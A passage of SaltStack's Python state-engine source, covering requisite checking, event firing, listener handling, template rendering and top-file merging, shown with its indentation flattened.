If the `state_events` is set to True in the config, then after the
chunk is evaluated an event will be set up to the master with the
results.
"""
if not self.opts.get("local") and (
self.opts.get("state_events", True) or fire_event
):
if not self.opts.get("master_uri"):
ev_func = lambda ret, tag, preload=None: salt.utils.event.get_master_event(
self.opts, self.opts["sock_dir"], listen=False
).fire_event(
ret, tag
)
else:
ev_func = self.functions["event.fire_master"]
ret = {"ret": chunk_ret}
if fire_event is True:
tag = salt.utils.event.tagify(
[self.jid, self.opts["id"], str(chunk_ret["name"])], "state_result",
)
elif isinstance(fire_event, str):
tag = salt.utils.event.tagify(
[self.jid, self.opts["id"], str(fire_event)], "state_result",
)
else:
tag = salt.utils.event.tagify(
[self.jid, "prog", self.opts["id"], str(chunk_ret["__run_num__"])],
"job",
)
ret["len"] = length
preload = {"jid": self.jid}
ev_func(ret, tag, preload=preload)
def call_chunk(self, low, running, chunks):
"""
Check if a chunk has any requires, execute the requires and then
the chunk
"""
low = self._mod_aggregate(low, running, chunks)
self._mod_init(low)
tag = _gen_tag(low)
if not low.get("prerequired"):
self.active.add(tag)
requisites = [
"require",
"require_any",
"watch",
"watch_any",
"prereq",
"onfail",
"onfail_any",
"onchanges",
"onchanges_any",
]
if not low.get("__prereq__"):
requisites.append("prerequired")
status, reqs = self.check_requisite(low, running, chunks, pre=True)
else:
status, reqs = self.check_requisite(low, running, chunks)
if status == "unmet":
lost = {}
reqs = []
for requisite in requisites:
lost[requisite] = []
if requisite not in low:
continue
for req in low[requisite]:
if isinstance(req, str):
req = {"id": req}
req = trim_req(req)
found = False
req_key = next(iter(req))
req_val = req[req_key]
for chunk in chunks:
if req_val is None:
continue
if req_key == "sls":
# Allow requisite tracking of entire sls files
if fnmatch.fnmatch(chunk["__sls__"], req_val):
if requisite == "prereq":
chunk["__prereq__"] = True
reqs.append(chunk)
found = True
continue
if fnmatch.fnmatch(chunk["name"], req_val) or fnmatch.fnmatch(
chunk["__id__"], req_val
):
if req_key == "id" or chunk["state"] == req_key:
if requisite == "prereq":
chunk["__prereq__"] = True
elif requisite == "prerequired":
chunk["__prerequired__"] = True
reqs.append(chunk)
found = True
if not found:
lost[requisite].append(req)
if (
lost["require"]
or lost["watch"]
or lost["prereq"]
or lost["onfail"]
or lost["onchanges"]
or lost["require_any"]
or lost["watch_any"]
or lost["onfail_any"]
or lost["onchanges_any"]
or lost.get("prerequired")
):
comment = "The following requisites were not found:\n"
for requisite, lreqs in lost.items():
if not lreqs:
continue
comment += "{}{}:\n".format(" " * 19, requisite)
for lreq in lreqs:
req_key = next(iter(lreq))
req_val = lreq[req_key]
comment += "{}{}: {}\n".format(" " * 23, req_key, req_val)
if low.get("__prereq__"):
run_dict = self.pre
else:
run_dict = running
start_time, duration = _calculate_fake_duration()
run_dict[tag] = {
"changes": {},
"result": False,
"duration": duration,
"start_time": start_time,
"comment": comment,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
self.event(run_dict[tag], len(chunks), fire_event=low.get("fire_event"))
return running
for chunk in reqs:
# Check to see if the chunk has been run, only run it if
# it has not been run already
ctag = _gen_tag(chunk)
if ctag not in running:
if ctag in self.active:
if chunk.get("__prerequired__"):
# Prereq recusive, run this chunk with prereq on
if tag not in self.pre:
low["__prereq__"] = True
self.pre[ctag] = self.call(low, chunks, running)
return running
else:
return running
elif ctag not in running:
log.error("Recursive requisite found")
running[tag] = {
"changes": {},
"result": False,
"comment": "Recursive requisite found",
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
self.event(
running[tag], len(chunks), fire_event=low.get("fire_event")
)
return running
running = self.call_chunk(chunk, running, chunks)
if self.check_failhard(chunk, running):
running["__FAILHARD__"] = True
return running
if low.get("__prereq__"):
status, reqs = self.check_requisite(low, running, chunks)
self.pre[tag] = self.call(low, chunks, running)
if not self.pre[tag]["changes"] and status == "change":
self.pre[tag]["changes"] = {"watch": "watch"}
self.pre[tag]["result"] = None
else:
running = self.call_chunk(low, running, chunks)
if self.check_failhard(chunk, running):
running["__FAILHARD__"] = True
return running
elif status == "met":
if low.get("__prereq__"):
self.pre[tag] = self.call(low, chunks, running)
else:
running[tag] = self.call(low, chunks, running)
elif status == "fail":
# if the requisite that failed was due to a prereq on this low state
# show the normal error
if tag in self.pre:
running[tag] = self.pre[tag]
running[tag]["__run_num__"] = self.__run_num
running[tag]["__sls__"] = low["__sls__"]
# otherwise the failure was due to a requisite down the chain
else:
# determine what the requisite failures where, and return
# a nice error message
failed_requisites = set()
# look at all requisite types for a failure
for req_lows in reqs.values():
for req_low in req_lows:
req_tag = _gen_tag(req_low)
req_ret = self.pre.get(req_tag, running.get(req_tag))
# if there is no run output for the requisite it
# can't be the failure
if req_ret is None:
continue
# If the result was False (not None) it was a failure
if req_ret["result"] is False:
# use SLS.ID for the key-- so its easier to find
key = "{sls}.{_id}".format(
sls=req_low["__sls__"], _id=req_low["__id__"]
)
failed_requisites.add(key)
_cmt = "One or more requisite failed: {}".format(
", ".join(str(i) for i in failed_requisites)
)
start_time, duration = _calculate_fake_duration()
running[tag] = {
"changes": {},
"result": False,
"duration": duration,
"start_time": start_time,
"comment": _cmt,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.pre[tag] = running[tag]
self.__run_num += 1
elif status == "change" and not low.get("__prereq__"):
ret = self.call(low, chunks, running)
if not ret["changes"] and not ret.get("skip_watch", False):
low = low.copy()
low["sfun"] = low["fun"]
low["fun"] = "mod_watch"
low["__reqs__"] = reqs
ret = self.call(low, chunks, running)
running[tag] = ret
elif status == "pre":
start_time, duration = _calculate_fake_duration()
pre_ret = {
"changes": {},
"result": True,
"duration": duration,
"start_time": start_time,
"comment": "No changes detected",
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
running[tag] = pre_ret
self.pre[tag] = pre_ret
self.__run_num += 1
elif status == "onfail":
start_time, duration = _calculate_fake_duration()
running[tag] = {
"changes": {},
"result": True,
"duration": duration,
"start_time": start_time,
"comment": "State was not run because onfail req did not change",
"__state_ran__": False,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
elif status == "onchanges":
start_time, duration = _calculate_fake_duration()
running[tag] = {
"changes": {},
"result": True,
"duration": duration,
"start_time": start_time,
"comment": "State was not run because none of the onchanges reqs changed",
"__state_ran__": False,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
else:
if low.get("__prereq__"):
self.pre[tag] = self.call(low, chunks, running)
else:
running[tag] = self.call(low, chunks, running)
if tag in running:
self.event(running[tag], len(chunks), fire_event=low.get("fire_event"))
for sub_state_data in running[tag].pop("sub_state_run", ()):
start_time, duration = _calculate_fake_duration()
self.__run_num += 1
sub_tag = _gen_tag(sub_state_data["low"])
running[sub_tag] = {
"name": sub_state_data["low"]["name"],
"changes": sub_state_data["changes"],
"result": sub_state_data["result"],
"duration": sub_state_data.get("duration", duration),
"start_time": sub_state_data.get("start_time", start_time),
"comment": sub_state_data.get("comment", ""),
"__state_ran__": True,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
return running
def call_listen(self, chunks, running):
"""
Find all of the listen routines and call the associated mod_watch runs
"""
listeners = []
crefs = {}
for chunk in chunks:
crefs[(chunk["state"], chunk["__id__"], chunk["name"])] = chunk
if "listen" in chunk:
listeners.append(
{(chunk["state"], chunk["__id__"], chunk["name"]): chunk["listen"]}
)
if "listen_in" in chunk:
for l_in in chunk["listen_in"]:
for key, val in l_in.items():
listeners.append(
{(key, val, "lookup"): [{chunk["state"]: chunk["__id__"]}]}
)
mod_watchers = []
errors = {}
for l_dict in listeners:
for key, val in l_dict.items():
for listen_to in val:
if not isinstance(listen_to, dict):
found = False
for chunk in chunks:
if (
chunk["__id__"] == listen_to
or chunk["name"] == listen_to
):
listen_to = {chunk["state"]: chunk["__id__"]}
found = True
if not found:
continue
for lkey, lval in listen_to.items():
if not any(lkey == cref[0] and lval in cref for cref in crefs):
rerror = {
_l_tag(lkey, lval): {
"comment": "Referenced state {}: {} does not exist".format(
lkey, lval
),
"name": "listen_{}:{}".format(lkey, lval),
"result": False,
"changes": {},
}
}
errors.update(rerror)
continue
to_tags = [
_gen_tag(data)
for cref, data in crefs.items()
if lkey == cref[0] and lval in cref
]
for to_tag in to_tags:
if to_tag not in running:
continue
if running[to_tag]["changes"]:
if not any(
key[0] == cref[0] and key[1] in cref
for cref in crefs
):
rerror = {
_l_tag(key[0], key[1]): {
"comment": "Referenced state {}: {} does not exist".format(
key[0], key[1]
),
"name": "listen_{}:{}".format(
key[0], key[1]
),
"result": False,
"changes": {},
}
}
errors.update(rerror)
continue
new_chunks = [
data
for cref, data in crefs.items()
if key[0] == cref[0] and key[1] in cref
]
for chunk in new_chunks:
low = chunk.copy()
low["sfun"] = chunk["fun"]
low["fun"] = "mod_watch"
low["__id__"] = "listener_{}".format(low["__id__"])
for req in STATE_REQUISITE_KEYWORDS:
if req in low:
low.pop(req)
mod_watchers.append(low)
ret = self.call_chunks(mod_watchers)
running.update(ret)
for err in errors:
errors[err]["__run_num__"] = self.__run_num
self.__run_num += 1
running.update(errors)
return running
def call_high(self, high, orchestration_jid=None):
"""
Process a high data call and ensure the defined states.
"""
errors = []
# If there is extension data reconcile it
high, ext_errors = self.reconcile_extend(high)
errors.extend(ext_errors)
errors.extend(self.verify_high(high))
if errors:
return errors
high, req_in_errors = self.requisite_in(high)
errors.extend(req_in_errors)
high = self.apply_exclude(high)
# Verify that the high data is structurally sound
if errors:
return errors
# Compile and verify the raw chunks
chunks = self.compile_high_data(high, orchestration_jid)
# If there are extensions in the highstate, process them and update
# the low data chunks
if errors:
return errors
ret = self.call_chunks(chunks)
ret = self.call_listen(chunks, ret)
def _cleanup_accumulator_data():
accum_data_path = os.path.join(
get_accumulator_dir(self.opts["cachedir"]), self.instance_id
)
try:
os.remove(accum_data_path)
log.debug("Deleted accumulator data file %s", accum_data_path)
except OSError:
log.debug("File %s does not exist, no need to cleanup", accum_data_path)
_cleanup_accumulator_data()
if self.jid is not None:
pause_path = os.path.join(self.opts["cachedir"], "state_pause", self.jid)
if os.path.isfile(pause_path):
try:
os.remove(pause_path)
except OSError:
# File is not present, all is well
pass
return ret
def render_template(self, high, template):
errors = []
if not high:
return high, errors
if not isinstance(high, dict):
errors.append(
"Template {} does not render to a dictionary".format(template)
)
return high, errors
invalid_items = ("include", "exclude", "extends")
for item in invalid_items:
if item in high:
errors.append(
"The '{}' declaration found on '{}' is invalid when "
"rendering single templates".format(item, template)
)
return high, errors
for name in high:
if not isinstance(high[name], dict):
if isinstance(high[name], str):
# Is this is a short state, it needs to be padded
if "." in high[name]:
comps = high[name].split(".")
high[name] = {
# '__sls__': template,
# '__env__': None,
comps[0]: [comps[1]]
}
continue
errors.append(
"ID {} in template {} is not a dictionary".format(
name, template
)
)
continue
skeys = set()
for key in sorted(high[name]):
if key.startswith("_"):
continue
if high[name][key] is None:
errors.append(
"ID '{}' in template {} contains a short "
"declaration ({}) with a trailing colon. When not "
"passing any arguments to a state, the colon must be "
"omitted.".format(name, template, key)
)
continue
if not isinstance(high[name][key], list):
continue
if "." in key:
comps = key.split(".")
# Salt doesn't support state files such as:
#
# /etc/redis/redis.conf:
# file.managed:
# - user: redis
# - group: redis
# - mode: 644
# file.comment:
# - regex: ^requirepass
if comps[0] in skeys:
errors.append(
"ID '{}' in template '{}' contains multiple "
"state declarations of the same type".format(name, template)
)
continue
high[name][comps[0]] = high[name].pop(key)
high[name][comps[0]].append(comps[1])
skeys.add(comps[0])
continue
skeys.add(key)
return high, errors
def call_template(self, template):
"""
Enforce the states in a template
"""
high = compile_template(
template,
self.rend,
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
)
if not high:
return high
high, errors = self.render_template(high, template)
if errors:
return errors
return self.call_high(high)
def call_template_str(self, template):
"""
Enforce the states in a template, pass the template as a string
"""
high = compile_template_str(
template,
self.rend,
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
)
if not high:
return high
high, errors = self.render_template(high, "<template-str>")
if errors:
return errors
return self.call_high(high)
class LazyAvailStates:
"""
The LazyAvailStates lazily loads the list of states of available
environments.
This is particularly usefull when top_file_merging_strategy=same and there
are many environments.
"""
def __init__(self, hs):
self._hs = hs
self._avail = {"base": None}
self._filled = False
def _fill(self):
if self._filled:
return
for saltenv in self._hs._get_envs():
if saltenv not in self._avail:
self._avail[saltenv] = None
self._filled = True
def __contains__(self, saltenv):
if saltenv == "base":
return True
self._fill()
return saltenv in self._avail
def __getitem__(self, saltenv):
if saltenv != "base":
self._fill()
if self._avail[saltenv] is None:
self._avail[saltenv] = self._hs.client.list_states(saltenv)
return self._avail[saltenv]
def items(self):
self._fill()
ret = []
for saltenv, states in self._avail:
ret.append((saltenv, self.__getitem__(saltenv)))
return ret
class BaseHighState:
"""
The BaseHighState is an abstract base class that is the foundation of
running a highstate, extend it and add a self.state object of type State.
When extending this class, please note that ``self.client`` and
``self.matcher`` should be instantiated and handled.
"""
def __init__(self, opts):
self.opts = self.__gen_opts(opts)
self.iorder = 10000
self.avail = self.__gather_avail()
self.serial = salt.payload.Serial(self.opts)
self.building_highstate = OrderedDict()
def __gather_avail(self):
"""
Lazily gather the lists of available sls data from the master
"""
return LazyAvailStates(self)
def __gen_opts(self, opts):
"""
The options used by the High State object are derived from options
on the minion and the master, or just the minion if the high state
call is entirely local.
"""
# If the state is intended to be applied locally, then the local opts
# should have all of the needed data, otherwise overwrite the local
# data items with data from the master
if "local_state" in opts:
if opts["local_state"]:
return opts
mopts = self.client.master_opts()
if not isinstance(mopts, dict):
# An error happened on the master
opts["renderer"] = "jinja|yaml"
opts["failhard"] = False
opts["state_top"] = salt.utils.url.create("top.sls")
opts["nodegroups"] = {}
opts["file_roots"] = {"base": [syspaths.BASE_FILE_ROOTS_DIR]}
else:
opts["renderer"] = mopts["renderer"]
opts["failhard"] = mopts.get("failhard", False)
if mopts["state_top"].startswith("salt://"):
opts["state_top"] = mopts["state_top"]
elif mopts["state_top"].startswith("/"):
opts["state_top"] = salt.utils.url.create(mopts["state_top"][1:])
else:
opts["state_top"] = salt.utils.url.create(mopts["state_top"])
opts["state_top_saltenv"] = mopts.get("state_top_saltenv", None)
opts["nodegroups"] = mopts.get("nodegroups", {})
opts["state_auto_order"] = mopts.get(
"state_auto_order", opts["state_auto_order"]
)
opts["file_roots"] = mopts["file_roots"]
opts["top_file_merging_strategy"] = mopts.get(
"top_file_merging_strategy", opts.get("top_file_merging_strategy")
)
opts["env_order"] = mopts.get("env_order", opts.get("env_order", []))
opts["default_top"] = mopts.get("default_top", opts.get("default_top"))
opts["state_events"] = mopts.get("state_events")
opts["state_aggregate"] = mopts.get(
"state_aggregate", opts.get("state_aggregate", False)
)
opts["jinja_env"] = mopts.get("jinja_env", {})
opts["jinja_sls_env"] = mopts.get("jinja_sls_env", {})
opts["jinja_lstrip_blocks"] = mopts.get("jinja_lstrip_blocks", False)
opts["jinja_trim_blocks"] = mopts.get("jinja_trim_blocks", False)
return opts
def _get_envs(self):
"""
Pull the file server environments out of the master options
"""
envs = ["base"]
if "file_roots" in self.opts:
envs.extend([x for x in list(self.opts["file_roots"]) if x not in envs])
env_order = self.opts.get("env_order", [])
# Remove duplicates while preserving the order
members = set()
env_order = [
env for env in env_order if not (env in members or members.add(env))
]
client_envs = self.client.envs()
if env_order and client_envs:
return [env for env in env_order if env in client_envs]
elif env_order:
return env_order
else:
envs.extend([env for env in client_envs if env not in envs])
return envs
def get_tops(self):
"""
Gather the top files
"""
tops = DefaultOrderedDict(list)
include = DefaultOrderedDict(list)
done = DefaultOrderedDict(list)
found = 0 # did we find any contents in the top files?
# Gather initial top files
merging_strategy = self.opts["top_file_merging_strategy"]
if merging_strategy == "same" and not self.opts["saltenv"]:
if not self.opts["default_top"]:
raise SaltRenderError(
"top_file_merging_strategy set to 'same', but no "
"default_top configuration option was set"
)
if self.opts["saltenv"]:
contents = self.client.cache_file(
self.opts["state_top"], self.opts["saltenv"]
)
if contents:
found = 1
tops[self.opts["saltenv"]] = [
compile_template(
contents,
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv=self.opts["saltenv"],
)
]
else:
tops[self.opts["saltenv"]] = [{}]
else:
found = 0
state_top_saltenv = self.opts.get("state_top_saltenv", False)
if state_top_saltenv and not isinstance(state_top_saltenv, str):
state_top_saltenv = str(state_top_saltenv)
for saltenv in (
[state_top_saltenv] if state_top_saltenv else self._get_envs()
):
contents = self.client.cache_file(self.opts["state_top"], saltenv)
if contents:
found = found + 1
tops[saltenv].append(
compile_template(
contents,
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv=saltenv,
)
)
else:
tops[saltenv].append({})
log.debug("No contents loaded for saltenv '%s'", saltenv)
if (
found > 1
and merging_strategy == "merge"
and not self.opts.get("env_order", None)
):
log.warning(
"top_file_merging_strategy is set to '%s' and "
"multiple top files were found. Merging order is not "
"deterministic, it may be desirable to either set "
"top_file_merging_strategy to 'same' or use the "
"'env_order' configuration parameter to specify the "
"merging order.",
merging_strategy,
)
if found == 0:
log.debug(
"No contents found in top file. If this is not expected, "
"verify that the 'file_roots' specified in 'etc/master' "
"are accessible. The 'file_roots' configuration is: %s",
repr(self.state.opts["file_roots"]),
)
# Search initial top files for includes
for saltenv, ctops in tops.items():
for ctop in ctops:
if "include" not in ctop:
continue
for sls in ctop["include"]:
include[saltenv].append(sls)
ctop.pop("include")
# Go through the includes and pull out the extra tops and add them
while include:
pops = []
for saltenv, states in include.items():
pops.append(saltenv)
if not states:
continue
for sls_match in states:
for sls in fnmatch.filter(self.avail[saltenv], sls_match):
if sls in done[saltenv]:
continue
tops[saltenv].append(
compile_template(
self.client.get_state(sls, saltenv).get("dest", False),
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv,
)
)
done[saltenv].append(sls)
for saltenv in pops:
if saltenv in include:
include.pop(saltenv)
return tops
def merge_tops(self, tops):
"""
Cleanly merge the top files
"""
merging_strategy = self.opts["top_file_merging_strategy"]
try:
merge_attr = "_merge_tops_{}".format(merging_strategy)
merge_func = getattr(self, merge_attr)
if not hasattr(merge_func, "__call__"):
msg = "'{}' is not callable".format(merge_attr)
log.error(msg)
raise TypeError(msg)
except (AttributeError, TypeError):
log.warning(
"Invalid top_file_merging_strategy '%s', falling back to " "'merge'",
merging_strategy,
)
merge_func = self._merge_tops_merge
return merge_func(tops)
def _merge_tops_merge(self, tops):
"""
The default merging strategy. The base env is authoritative, so it is
checked first, followed by the remaining environments. In top files
from environments other than "base", only the section matching the
environment from the top file will be considered, and it too will be
ignored if that environment was defined in the "base" top file.
"""
top = DefaultOrderedDict(OrderedDict)
# Check base env first as it is authoritative
base_tops = tops.pop("base", DefaultOrderedDict(OrderedDict))
for ctop in base_tops:
for saltenv, targets in ctop.items():
if saltenv == "include":
continue
try:
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
for cenv, ctops in tops.items():
for ctop in ctops:
for saltenv, targets in ctop.items():
if saltenv == "include":
continue
elif saltenv != cenv:
log.debug(
"Section for saltenv '%s' in the '%s' "
"saltenv's top file will be ignored, as the "
"top_file_merging_strategy is set to 'merge' "
"and the saltenvs do not match",
saltenv,
cenv,
)
continue
elif saltenv in top:
log.debug(
"Section for saltenv '%s' in the '%s' "
"saltenv's top file will be ignored, as this "
"saltenv was already defined in the 'base' top "
"file",
saltenv,
cenv,
)
continue
try:
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
return top
def _merge_tops_same(self, tops):
"""
For each saltenv, only consider the top file from that saltenv. All
sections matching a given saltenv, which appear in a different
saltenv's top file, will be ignored.
"""
top = DefaultOrderedDict(OrderedDict)
for cenv, ctops in tops.items():
if all([x == {} for x in ctops]):
# No top file found in this env, check the default_top
default_top = self.opts["default_top"]
fallback_tops = tops.get(default_top, [])
if all([x == {} for x in fallback_tops]):
# Nothing in the fallback top file
log.error(
"The '%s' saltenv has no top file, and the fallback "
"saltenv specified by default_top (%s) also has no "
"top file",
cenv,
default_top,
)
continue
for ctop in fallback_tops:
for saltenv, targets in ctop.items():
if saltenv != cenv:
continue
log.debug(
"The '%s' saltenv has no top file, using the "
"default_top saltenv (%s)",
cenv,
default_top,
)
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
break
else:
log.error(
"The '%s' saltenv has no top file, and no "
"matches were found in the top file for the "
"default_top saltenv (%s)",
cenv,
default_top,
)
continue
else:
for ctop in ctops:
for saltenv, targets in ctop.items():
if saltenv == "include":
continue
elif saltenv != cenv:
log.debug(
"Section for saltenv '%s' in the '%s' "
"saltenv's top file will be ignored, as the "
"top_file_merging_strategy is set to 'same' "
"and the saltenvs do not match",
saltenv,
cenv,
)
continue
try:
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
return top
def _merge_tops_merge_all(self, tops):
"""
Merge the top files into a single dictionary
"""
def _read_tgt(tgt):
match_type = None
states = []
for item in tgt:
if isinstance(item, dict):
match_type = item
if isinstance(item, str):
states.append(item)
return match_type, states
top = DefaultOrderedDict(OrderedDict)
for ctops in tops.values():
for ctop in ctops:
for saltenv, targets in ctop.items():
if saltenv == "include":
continue
try:
for tgt in targets:
if tgt not in top[saltenv]:
top[saltenv][tgt] = ctop[saltenv][tgt]
continue
m_type1, m_states1 = _read_tgt(top[saltenv][tgt])
m_type2, m_states2 = _read_tgt(ctop[saltenv][tgt])
merged = []
match_type = m_type2 or m_type1
if match_type is not None:
merged.append(match_type)
merged.extend(m_states1)
merged.extend([x for x in m_states2 if x not in merged])
top[saltenv][tgt] = merged
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
return top
def verify_tops(self, tops):
"""
Verify the contents of the top file data
"""
errors = []
if not isinstance(tops, dict):
errors.append("Top data was not formed as a dict")
# No further checks will work, bail out
return errors
for saltenv, matches in tops.items():
if saltenv == "include":
continue
if not isinstance(saltenv, str):
errors.append(
"Environment {} in top file is not formed as a "
"string".format(saltenv)
)
if saltenv == "":
errors.append("Empty saltenv statement in top file")
if not isinstance(matches, dict):
errors.append(
"The top file matches for saltenv {} are not "
"formatted as a dict".format(saltenv)
)
for slsmods in matches.values():
if not isinstance(slsmods, list):
errors.append(
"Malformed topfile (state declarations not " "formed as a list)"
)
continue
for slsmod in slsmods:
if isinstance(slsmod, dict):
# This value is a match option
for val in slsmod.values():
if not val:
errors.append(
"Improperly formatted top file matcher "
"in saltenv {}: {} file".format(slsmod, val)
)
elif isinstance(slsmod, str):
# This is a sls module
if not slsmod:
errors.append(
"Environment {} contains an empty sls "
"index".format(saltenv)
)
return errors
def get_top(self):
"""
Returns the high data derived from the top file
"""
try:
tops = self.get_tops()
except SaltRenderError as err:
log.error("Unable to render top file: %s", err.error)
return {}
return self.merge_tops(tops)
def top_matches(self, top):
"""
Search through the top high data for matches and return the states
that this minion needs to execute.
Returns:
{'saltenv': ['state1', 'state2', ...]}
"""
matches = DefaultOrderedDict(OrderedDict)
# pylint: disable=cell-var-from-loop
for saltenv, body in top.items():
if self.opts["saltenv"]:
if saltenv != self.opts["saltenv"]:
continue
for match, data in body.items():
def _filter_matches(_match, _data, _opts):
if isinstance(_data, str):
_data = [_data]
if self.matchers["confirm_top.confirm_top"](_match, _data, _opts):
if saltenv not in matches:
matches[saltenv] = []
for item in _data:
if "subfilter" in item:
_tmpdata = item.pop("subfilter")
for match, data in _tmpdata.items():
_filter_matches(match, data, _opts)
if isinstance(item, str):
matches[saltenv].append(item)
elif isinstance(item, dict):
env_key, inc_sls = item.popitem()
if env_key not in self.avail:
continue
if env_key not in matches:
matches[env_key] = []
matches[env_key].append(inc_sls)
_filter_matches(match, data, self.opts["nodegroups"])
ext_matches = self._master_tops()
for saltenv in ext_matches:
top_file_matches = matches.get(saltenv, [])
if self.opts.get("master_tops_first"):
first = ext_matches[saltenv]
second = top_file_matches
else:
first = top_file_matches
second = ext_matches[saltenv]
matches[saltenv] = first + [x for x in second if x not in first]
# pylint: enable=cell-var-from-loop
return matches
def _master_tops(self):
"""
Get results from the master_tops system. Override this function if the
execution of the master_tops needs customization.
"""
return self.client.master_tops()
def load_dynamic(self, matches):
"""
If autoload_dynamic_modules is True then automatically load the
dynamic modules
"""
if not self.opts["autoload_dynamic_modules"]:
return
syncd = self.state.functions["saltutil.sync_all"](list(matches), refresh=False)
if syncd["grains"]:
self.opts["grains"] = salt.loader.grains(self.opts)
self.state.opts["pillar"] = self.state._gather_pillar()
self.state.module_refresh()
def render_state(self, sls, saltenv, mods, matches, local=False, context=None):
"""
Render a state file and retrieve all of the include states
"""
errors = []
if not local:
state_data = self.client.get_state(sls, saltenv)
fn_ = state_data.get("dest", False)
else:
fn_ = sls
if not os.path.isfile(fn_):
errors.append(
"Specified SLS {} on local filesystem cannot "
"be found.".format(sls)
)
state = None
if not fn_:
errors.append(
"Specified SLS {} in saltenv {} is not "
"available on the salt master or through a configured "
"fileserver".format(sls, saltenv)
)
else:
try:
state = compile_template(
fn_,
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv,
sls,
rendered_sls=mods,
context=context,
)
except SaltRenderError as exc:
msg = "Rendering SLS '{}:{}' failed: {}".format(saltenv, sls, exc)
log.critical(msg)
errors.append(msg)
except Exception as exc: # pylint: disable=broad-except
msg = "Rendering SLS {} failed, render error: {}".format(sls, exc)
log.critical(
msg,
# Show the traceback if the debug logging level is enabled
exc_info_on_loglevel=logging.DEBUG,
)
errors.append("{}\n{}".format(msg, traceback.format_exc()))
try:
mods.add("{}:{}".format(saltenv, sls))
except AttributeError:
pass
if state:
if not isinstance(state, dict):
errors.append("SLS {} does not render to a dictionary".format(sls))
else:
include = []
if "include" in state:
if not isinstance(state["include"], list):
err = (
"Include Declaration in SLS {} is not formed "
"as a list".format(sls)
)
errors.append(err)
else:
include = state.pop("include")
self._handle_extend(state, sls, saltenv, errors)
self._handle_exclude(state, sls, saltenv, errors)
self._handle_state_decls(state, sls, saltenv, errors)
for inc_sls in include:
# inc_sls may take the form of:
# 'sls.to.include' <- same as {<saltenv>: 'sls.to.include'}
# {<env_key>: 'sls.to.include'}
# {'_xenv': 'sls.to.resolve'}
xenv_key = "_xenv"
if isinstance(inc_sls, dict):
env_key, inc_sls = inc_sls.popitem()
else:
env_key = saltenv
if env_key not in self.avail:
msg = (
"Nonexistent saltenv '{}' found in include "
"of '{}' within SLS '{}:{}'".format(
env_key, inc_sls, saltenv, sls
)
)
log.error(msg)
errors.append(msg)
continue
if inc_sls.startswith("."):
match = re.match(r"^(\.+)(.*)$", inc_sls)
if match:
levels, include = match.groups()
else:
msg = (
"Badly formatted include {} found in include "
"in SLS '{}:{}'".format(inc_sls, saltenv, sls)
)
log.error(msg)
errors.append(msg)
continue
level_count = len(levels)
p_comps = sls.split(".")
if state_data.get("source", "").endswith("/init.sls"):
p_comps.append("init")
if level_count > len(p_comps):
msg = (
"Attempted relative include of '{}' "
"within SLS '{}:{}' "
"goes beyond top level package ".format(
inc_sls, saltenv, sls
)
)
log.error(msg)
errors.append(msg)
continue
inc_sls = ".".join(p_comps[:-level_count] + [include])
if env_key != xenv_key:
if matches is None:
matches = []
# Resolve inc_sls in the specified environment
if env_key in matches or fnmatch.filter(
self.avail[env_key], inc_sls
):
resolved_envs = [env_key]
else:
resolved_envs = []
else:
# Resolve inc_sls in the subset of environment matches
resolved_envs = [
aenv
for aenv in matches
if fnmatch.filter(self.avail[aenv], inc_sls)
]
# An include must be resolved to a single environment, or
# the include must exist in the current environment
if len(resolved_envs) == 1 or saltenv in resolved_envs:
# Match inc_sls against the available states in the
# resolved env, matching wildcards in the process. If
# there were no matches, then leave inc_sls as the
# target so that the next recursion of render_state
# will recognize the error.
sls_targets = fnmatch.filter(self.avail[saltenv], inc_sls) or [
inc_sls
]
for sls_target in sls_targets:
r_env = (
resolved_envs[0] if len(resolved_envs) == 1 else saltenv
)
mod_tgt = "{}:{}".format(r_env, sls_target)
if mod_tgt not in mods:
nstate, err = self.render_state(
sls_target, r_env, mods, matches
)
if nstate:
self.merge_included_states(state, nstate, errors)
state.update(nstate)
if err:
errors.extend(err)
else:
msg = ""
if not resolved_envs:
msg = (
"Unknown include: Specified SLS {}: {} is not available on the salt "
"master in saltenv(s): {} "
).format(
env_key,
inc_sls,
", ".join(matches) if env_key == xenv_key else env_key,
)
elif len(resolved_envs) > 1:
msg = (
"Ambiguous include: Specified SLS {}: {} is available on the salt master "
"in multiple available saltenvs: {}"
).format(env_key, inc_sls, ", ".join(resolved_envs))
log.critical(msg)
errors.append(msg)
try:
self._handle_iorder(state)
except TypeError:
log.critical("Could not render SLS %s. Syntax error detected.", sls)
else:
state = {}
return state, errors
def _handle_iorder(self, state):
"""
Take a state and apply the iorder system
"""
if self.opts["state_auto_order"]:
for name in state:
for s_dec in state[name]:
if not isinstance(s_dec, str):
# PyDSL OrderedDict?
continue
if not isinstance(state[name], dict):
# Include's or excludes as lists?
continue
if not isinstance(state[name][s_dec], list):
# Bad syntax, let the verify seq pick it up later on
continue
found = False
if s_dec.startswith("_"):
continue
for arg in state[name][s_dec]:
if isinstance(arg, dict):
if len(arg) > 0:
if next(iter(arg.keys())) == "order":
found = True
if not found:
if not isinstance(state[name][s_dec], list):
